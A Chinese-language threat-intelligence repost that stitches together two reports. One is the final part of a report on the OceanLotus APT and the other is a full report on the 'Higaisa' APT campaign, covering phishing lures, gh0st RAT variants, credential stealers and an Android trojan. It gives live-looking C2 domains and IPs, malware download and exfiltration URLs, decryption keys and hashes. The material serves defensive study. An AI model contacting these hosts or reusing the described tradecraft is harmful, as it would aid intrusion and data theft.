
修改版Gh0st:

2.8 持续的内网渗透

通过钓鱼攻击攻陷一台主机后,海莲花还会不断对被攻击的内网进行渗透攻击活动,以此来渗透到更多的内网机器:

扫描:

获取hash:

打包文件:

此外,还会还会通过powershell,创建计划任务来下载持久化的工具:

最终的恶意文件为goopdate.dll,跟上文所述的第二阶段下发后门一致。

三、可能存在的假旗活动

在跟踪海莲花的过程中,我们还发现了一些跟海莲花活动类似的攻击:

如:

可以看出该批活动跟海莲花的类似:如关键字、使用白加黑等。

而该文件最终的执行的恶意代码为两种:

一种是CobaltStrike生成的Beacon payload;

另一种是metasploit生成的block_reverse_http的paylaod。

虽然CobaltStrike的Beacon木马海莲花组织一直在进行使用,但是之前未发现有metasploit生成的payload,这似乎跟之前的海莲花攻击活动又有些不一致。

此外该批活动的c2都在中国境内(包括中国香港),这似乎跟之前的攻击活动也不大一样:

虽然这波活动在极力模仿海莲花的一些攻击行为,但是也依然存在不同的地方。因此暂未有更多的证据可以表明该活动归属于海莲花还是其他组织使用的假旗(false flag)活动。因此在这先不做定论,等待更多的证据和关联的依据。

四、总结

海莲花组织是近年来针对中国大陆的敏感部门进行攻击最活跃的APT组织,甚至没有之一。当然该组织也是被安全公司曝光的针对中国大陆攻击活动报告最多的APT攻击组织。尽管被安全厂商频繁曝光,该组织并未有停手迹象,反而不断更新其技术和武器库,包括诱饵、payload、新的漏洞利用等,此外也有众多跟杀软的对抗手段,如自增文件大小、混淆方式、定制化的payload等。

因此我们提醒相关部门和相关人员,切记提高安全意识,不要随意执行来历不明的邮件的附件,不要被钓鱼信息所蒙蔽。

五、安全建议

1、提升安全意识,不要打开来历不明的邮件的附件;除非文档来源可靠,用途明确,否则不要轻易启用Office的宏代码;

2、及时安装操作系统补丁和Office等重要软件的补丁;

3、使用杀毒软件防御可能的病毒木马攻击。

六、IOCs

MD5:

e7920ac10815428de937f2fca076b94c

4095b9682af13ca1e897ca9cc097ec69

b96de3d0023542f8624b82b9773373e9

5c5f8c80dcb3283afeb092cb0c13a58a

c90c7abcee1d98a8663904d739185d16

d249411f003d05c0cea012c11ba13716

3489140891e67807c550aa91c67dc4ad

22f8736bbc96c1a58ab07326d730a235

dade969b00cbc4a0c1***eeb0e740b63

3c3b2cc9ff5d7030fb01496510ac75f2

d604c33d6ec99a87a672b3202cb60fa7

861fc5624fd1920e9d9cc7a236817dd7

8e2b5b95980cf52e99acfa95f5e1570b

3c8b2d20e428f8207b4324b***f5d228

a81424e973b310edd50aed37590f4b8a

cf5d6d28c388edf58e55412983cf804a

6b8bec74620fbf88263b48c5a11b682e

9eb55481a0b5fcd255c8fb8de1042f88

5c00063b11c4710fe5a5a1adaf208b12

d30bc57624d233d94dc53a62908ef2df

886d0dd67e4cf132a1aed84263d661e3

2b3c5c831eb6b921ac128c4d44d70a7a

1dfb41e5919af80c7d0fa163a90e21e5

C&C:

360skylar.host

wechats.asis

news.shangrilaexports.com

clip.shangweidesign.com

jcdn.jsoid.com

libjs.inquirerjs.com

baidu-search.net

sys.genevrebreinl.com

ad.ssageevrenue.com

tel.caitlynwells.com

us.melvillepitcairn.com

upgrade.coldriverhardware.com

cdnwebmedia.com

43.251.100.20

43.254.217.67

114.118.80.233

七、 MITRE ATT&CK

Tactic ID Name
Initial Access T1193 Spearphishing Attachment
Execution T1106 Execution through API
T1129 Execution through Module Load
T1203 Exploitation for Client Execution
T1085 Rundll32
T1204 User Execution
T1223 Compiled HTML File
T1053 Scheduled Task
T1117 Regsv***
Persistence T1179 Hooking
T1053 Scheduled Task
T1060 Registry Run Keys / Startup Folder
Defense Evasion T1107 File Deletion
T1140 Deobfuscate/Decode Files or Information
T1036 Masquerading
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1085 Rundll32
T1099 Timestomp
T1117 Regsv***
Credential Access T1179 Hooking
T1056 Input Capture
Discovery T1083 File and Directory Discovery
T1046 Network Service Scanning
T1135 Network Share Discovery
T1057 Process Discovery
T1082 System Information Discovery
T1007 System Service Discovery
Lateral Movement T1534 Internal Spearphishing
Collection T1005 Data from Local System
  T1025 Data from Removable Media
  T1123 Audio Capture
  T1056 Input Capture
  T1113 Screen Capture
  T1115 Clipboard Data
Command and Control T1043 Commonly Used Port
  T1094 Custom Command and Control Protocol
  T1024 Custom Cryptographic Protocol
  T1001 Data Obfuscation
  T1065 Uncommonly Used Port

八、参考链接

https://s.tencent.com/research/report/715.html

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM

一、概述

腾讯安全御见威胁情报中心曾经在2019年年初捕获到一次有意思的攻击活动,该攻击活动一直持续到现在。根据对该组织活动中所使用的攻击技术、被攻击人员背景等分析研判,我们认为该攻击组织为来自朝鲜半岛的一个具有政府背景的APT攻击组织。

根据腾讯安全御见威胁情报中心的大数据分析发现,该组织的攻击活动至少可以追溯到2016年,而一直持续活跃到现在。该组织常利用节假日、朝鲜国庆等朝鲜重要时间节点来进行钓鱼活动,诱饵内容包括新年祝福、元宵祝福、朝鲜国庆祝福,以及重要新闻、海外人员联系录等等。此外,该攻击组织还具有移动端的攻击能力。被攻击的对象还包括跟朝鲜相关的外交实体(如驻各地大使馆官员)、政府官员、人权组织、朝鲜海外居民、贸易往来人员等。目前监测到的受害国家包括中国、朝鲜、日本、尼泊尔、新加坡、俄罗斯、波兰、瑞士等。

对于该组织的归属,腾讯安全分析了大量样本,我们确信其来自于朝鲜半岛。对攻击背景分析后,我们认为该组织为来自韩国的一个攻击组织。从样本的技术细节、基础设施等经过详细分析后,我们尚无证据证明该组织跟韩国的另一攻击组织DarkHotel(黑店)有关联,即便是攻击对象、某些攻击手法跟DarkHotel(黑店)有一些类似。

我们决定把该组织列为来自韩国的又一独立的攻击组织,取名为”黑格莎(Higaisa)”。源于作者喜欢使用的R**的解密密钥为“Higaisakora”,取Higaisa的英译。

“黑格莎(Higaisa)”组织攻击流程图:

目前尚不排除该组织为DarkHotel的某一分支。由于受限于样本、受控机、基础设施等等客观情况,可能在组织归属上存在一些细节的误判和遗漏,我们希望安全社区同仁来共同完善该组织的一些细节。

值得注意的是,我们曾在腾讯安全2019年上半年APT总结报告中有提及该组织的攻击活动,当时我们错误的把该组织归属到了Group123。因此也借本文对该错误归属进行勘误和致歉,同时本文也对该活动进行更为详细的活动披露。若存在错误,望安全同仁一起来指正。

有关“黑格莎(Higaisa)”攻击活动的完整报告,请从这里下载:

https://pc1.gtimg.com/softmgr/files/higaisa_apt_report.pdf

二、攻击过程

最初始的攻击,从邮件钓鱼开始,邮件内容如下:

邮件内容为韩语的元旦祝福:

而从后面的分析可知,在节假日发祝福邮件投递恶意文件,是该组织的惯用伎俩。

邮件的附件为一个压缩包,解压后为一个可执行文件,该可执行文件其实为一个dropper木马:

执行后,会释放并打开诱饵,以及释放恶意文件carsrvdx.sed到系统目录并通过设置注册表创建服务使得该dll以系统服务的方式开机自启动实现持久化:

其中,payload文件加密存储在资源中,释放的过程涉及简单的R**解密,密钥为ssove0117:

释放的carsrvdx.sed实际为一个downloader,该文件首先会构造url,从http://info.hangro.net/file/start?session=[8位随机数字]&imsi=0获取要下载的文件名:

得到文件名avp.exe、avpif.exe后再构造以下URL进行下载后再构造以下URL进行下载:

http://info.hangro.net/file/start?session=[8位随机数字]&imsi=avp.exe

http://info.hangro.net/file/start?session=[8位随机数字]&imsi=avpif.exe

下载回来的文件同样需要经过简单的R**解密,密钥为Higaisakora.0。下载回来的文件avp.exe(fca3260cff04a9c89e6e5d23a318992c),是一个基于gh0st开源远控框架修改而来远程控制木马,除了命令分发和数据包压缩算法弃用原来的之外,其他内容未发现重大改动,基本保留的原来的框架。

而命令分发部分改动较大,删除了绝大部分的命令处理函数,只保留了插件管理功能,木马的所有功能都将通过插件完成,成功下载了回来的插件为FileManager.dll(dd99d917eb17ddca2fb4460ecf6304b6,注:内存加载不落地),为文件管理插件,其命令分发与gh0st源码相似性达90%以上:

下载回来的另外一个文件为avpif.exe (77100e638dd8ef8db4b3370d066984a9),该文件的功能主要是收集系统信息,并回传。

收集的信息包括:

系统信息:计算机硬件、系统版本、用户信息、系统补丁、网卡信息等

网络信息:本地网络信息

进程列表

显示域、计算机、等共享资源的列表

C盘文件列表

D盘文件列表

E盘文件列表

收集完成后加密上传到服务器中,上传url为:http://180.150.227.24/do/index.php?id=ssss

三、关联分析

通过腾讯安全御见威胁情报中心的大数据分析和挖掘,我们发现大量跟该攻击相关的样本。我们对该组织的攻击活动进行梳理,使我们对该组织的攻击活动有更深入的了解。

1、初始攻击

通过监测发现,攻击活动均为使用鱼叉邮件攻击的方式。而攻击的时间窗口基本都在重要节假日。通过发送节日祝福,附带恶意文件的方式进行攻击。

我们根据payload解密的密码” Higaisakora.0″进行搜索,搜索到了另一篇分析文章:https://malware.prevenity.com/2018/03/happy-new-year-wishes-from-china.html

虽然无法获取该报告中的样本,但根据报告中的截图和描述,可以确定为同一木马的不同变种。而根据该文章的披露,攻击方式同样为通过在节假日发送祝福邮件,并附带恶意文件的方式:

此外,有意思的是,我们发现该邮件的发送邮箱为gov.cn的邮箱,我们猜测攻击者可能首先攻破了某gov.cn的邮箱,然后利用该邮箱继续进行钓鱼工作。同样我们发现发件人邮箱同样存在china字眼,因此我们猜测,该组织习惯利用跟中国有关的邮箱做为跳板来进行下一步的攻击。

2、攻击诱饵

诱饵的类型根据文件种类分为两类,一类为可执行文件,另一类为恶意文档类。

1) 可执行文件类诱饵:

可执行文件类又分为两个类型:

l 类型一:伪装为图像文件或文档文件,运行后会释放相关的图片或文档

该类型的可执行文件的图标一般要么伪装成word、excel、pdf、txt、邮件等软件的图标,要么直接是图片的内容图标:

内容主要分为:

(1) 传统节假日问候,如新年、元宵节、端午节、圣诞节等:

(2) 朝鲜国庆、领导人纪念日等相关:

(3) 新闻:

(4) 其他(包括色情图片或文本):

所有该类型的诱饵的技术特点为:

a) 将payload及伪装文件存放在PE资源中;

b) 伪装文件未加密无需解密,payload需使用R**解密后释放;

c) 字符串以局部数组的形式存储,绝大部分API函数使用动态调用;

d) 释放payload后,创建系统服务将其加载执行;

此外,我们发现这些诱饵内容都非常的及时,如某一诱饵为一个新闻,讲的是牡丹峰团长玄松月在平昌冬奥会前访问韩国:

通过搜索,该新闻是2018年1月22日:

而发现的利用该诱饵攻击的另一攻击样本(fa8c53431746d9ccc550f75f15b14b97),其编译日期为1月26日:

可以发现该组织非常擅长利用最新热点新闻。

l 类型二:伪装成Winrar、Teamview、播放器等常用软件

如运行后,除了释放原本的安装文件外,还会释放gh0st木马:

释放文件路径:C:\WINDOWS\system32\dilmtxce32.dll,而释放的文件同样需要通过解密,密钥为HXvsEoal_s。

2) 恶意文档型诱饵:

我们发现的另一个攻击母体为(a5a0bc689c1ea4b1c1336c1cde9990a4),其路径为\AppData\Roaming\Microsoft\Word\STARTUP\winhelp.wll,而该目录为word的启动文件夹,当word启动的时候,会自动加载该目录下的模块文件。因此该手法常做为office后门加载方式的重要手法。

遗憾的是,我们并未获取到相关的文档文件,因此尚不知该启动文件是执行了某一恶意文档释放的(因为有很多攻击诱饵会利用漏洞等方式释放相关恶意文件到word启动目录),还是其他的母体释放到该目录的。不过我们认为由某一恶意文档通过漏洞释放的可能性更大。

该wll文件加载后,会释放文件在%USERPROFILE%\PolicyDefinitions\MMCSnapins.exe,该文件是个downloader,下载回来的文件有3个,分别为infostealer木马,用于窃取文件目录结构;gh0st RAT插件版;另一个未知的完整功能的RAT木马。

3、解密密码

我们发现该组织非常喜欢使用R**加密算法,如解密释放的payload,解密下载回来的文件等。我们发现他的payload的解密密码跟随着时间而进行变化,但是downloader下载回来的文件解密木马始终都为Higaisakora.0。目前其解密payload的最新使用的密码为XsDAe0601。我们整理了一份时间和密码的对应表如下(相同的密码只取了一个):

可以看到,随着时间的变化,密码也相应的进行了变化。虽然密码上并未有相应的规律可以获取,但是至少也说明了作者一直在进行更新。

4、其他文件分析

我们还在相关受控机上发现大量其他文件,相信是该组织下发用来进行持续渗透和横向移动的工具。具体如下:

1) 键盘记录器

文件BioCredProv.exe(6e95c5c01f94ef7154e30b4b23e81b36),用于记录按键、窗口信息。

2) 邮件相关

out1.exe (901e131af1ee9e7fb618fc9f13e460a7),pdb为:E:\code\PasswordRecover\do_ok\OutlookPassRecover\Release\OutlookPassRecover.pdb

该文件的功能是outlook密码窃取,窃取的outlook账号密码保存到c:\\users\\public\\result.dat。

文件out12.exe (08993d75bee06fc44c0396b4e643593c),pdb路径为:

E:\code\PasswordRecover\outlook\OutlookPasswordRecovery-master\OutlookPasswordRecovery\obj\Release\OutlookPasswordRecovery.pdb

该文件的功能同样为窃取outlook账号密码,窃取的信息保存为Module.log。

根据pdb的路径在github上搜索,发现了该工程:

https://github.com/0Fdemir/OutlookPasswordRecovery

跟文件里的完全一致:

3) 非插件版的Gh0st RAT

之前发现的gh0st RAT均为插件版的gh0st RAT,也就是说所有功能通过插件来完成,但是我们在某台受控机上还发现一个非插件版的gh0st RAT,并且通过Installer解密数据文件.vnd后执行。

安装器的文件路径为:E:\360Rec\sun.exe(cc63f5420e61f2ee2e0d791e13e963f1)

最后解密后生成的文件C:Windows\system32\PRT\WinDef32.dll(c5f0336b18a1929d7bd17d09777bdc6c)就为非插件版的gh0st。其中主命令分发,只保留了部分gh0st功能,包括文件管理、屏幕监控、键盘记录、远程Shell等,而文件管理功能,保留了gh0st RAT文件管理的全部指令,并增加了获取和设置文件时间的功能。

5、移动端木马分析

通过拓展分析,我们还发现了几个安卓木马,如검찰청(翻译:监察厅).apk(8d3af3fea7cd5f93823562c1a62e598a):

该apk执行后界面如下:

伪装韩国检察厅APP,主要为访问网站http://www.spo.go.kr/spo/index.jsp

实际上该app为一个远控木马,能够实现手机截屏、GPS位置信息获取、SMS短信获取、通话录音、通讯录获取、下载木马、上传文件等功能。

6、攻击归属分析

1) 攻击样本中的地域分析

我们抽取了部分样本对编译的时间戳进行了分析(不包含被篡改的):

可以发现编译的时间主要发生在上午8点后,大部分时间都在晚上23点前。按照普通人的生活习惯,我们认为可能是在东9区的攻击者。正好覆盖朝鲜半岛。

其次我们发现样本中出现的naver.com字符:

naver为韩国最大的搜索引擎和门户网站。

2) 攻击对象分析:

因为诱饵内容几乎都跟朝鲜有一定的关系,包括朝鲜的国庆、朝鲜的联系人名单等;

从钓鱼目标对象来看,基本都为朝鲜的外交官、海外居民、和朝有贸易往来人员等等;

从受控机属性来看也几乎都为中朝贸易人员。

因此我们判断攻击的对象为与朝鲜相关的人员。

3) 攻击手法

攻击手法包括钓鱼、伪装常用软件、下载插件等等,并且还具有多平台的攻击能力。

4) 结论

从上述分析我们认为,攻击者可能来自朝鲜半岛,由于攻击目标为跟朝鲜相关,我们判断攻击者可能来自韩国。其次,从攻击手法、对象来看,跟韩国的另外一个APT攻击组织DarkHotel(黑店)比较类似。但是,从样本、基础设施等分析来看,我们并未发现有跟DarkHotel重叠的部分,也未有明确证据证明跟DarkHotel相关。但我们并不排除该组织或为DarkHotel的分支。

鉴于此,我们决定暂时把该攻击小组列为一个独立的攻击组织,取名为”黑格莎(Higaisa)”。归属过程可能因信息有限,或存在错误,我们希望安全同仁一起来完善该组织的更多信息。

四、总结

当节假日来临,我们往往会收到来自各地的祝福信息,尤其是单位的邮箱。但是一些别有用心的攻击者往往利用此机会,附带恶意文件进行攻击。而本次攻击主要是针对朝鲜相关的一些政治实体、人权组织、商贸等关系单位和人员,因此也有波及中国境内和朝鲜进行贸易的一些人员。

此外,该攻击组织的攻击武器库也一直在进行更新,而且除了pc端,也具有移动端攻击的能力。我们判断,该攻击活动必然还会继续进行下去,因此我们提醒相关人员,一定要提高安全意识,避免遭受不必要的损失。

五、安全建议

我们建议外贸企业及重要机构参考以下几点加强防御:

1、通过官方渠道或者正规的软件分发渠道下载相关软件;

2、谨慎连接公用的WiFi网络。若必须连接公用WiFi网络,建议不要进行可能泄露机密信息或隐私信息的操作,如收发邮件、IM通信、银行转账等;最好不要在连接公用WiFi时进行常用软件的升级操作;

3、提升安全意识,不要打开来历不明的邮件的附件;除非文档来源可靠,用途明确,否则不要轻易启用Office的宏代码;

4、及时安装操作系统补丁和Office等重要软件的补丁;

5、使用杀毒软件防御可能得病毒木马攻击,对于企业用户,推荐使用腾讯御点终端安全管理系统。

6、推荐企业用户部署腾讯御界高级威胁检测系统及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html

六、附录

1、IOCs

MD5:

7c94a0e412cc46db5904080980d993c3

6febd1729c49f434b6b062edf8d3e7f3

fca3260cff04a9c89e6e5d23a318992c

77100e638dd8ef8db4b3370d066984a9

dd99d917eb17ddca2fb4460ecf6304b6

7d6f2cd3b7984d112b26ac744af8428d

8d3af3fea7cd5f93823562c1a62e598a

C2:

info.hangro.net

console.hangro.net

register.welehope.com

www.phpvlan.com

wiki.xxxx.com

180.150.227.24

39.109.4.143

103.81.171.157

2、参考文章

1)https://malware.prevenity.com/2018/03/happy-new-year-wishes-from-china.html

2)https://s.tencent.com/research/report/762.html

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM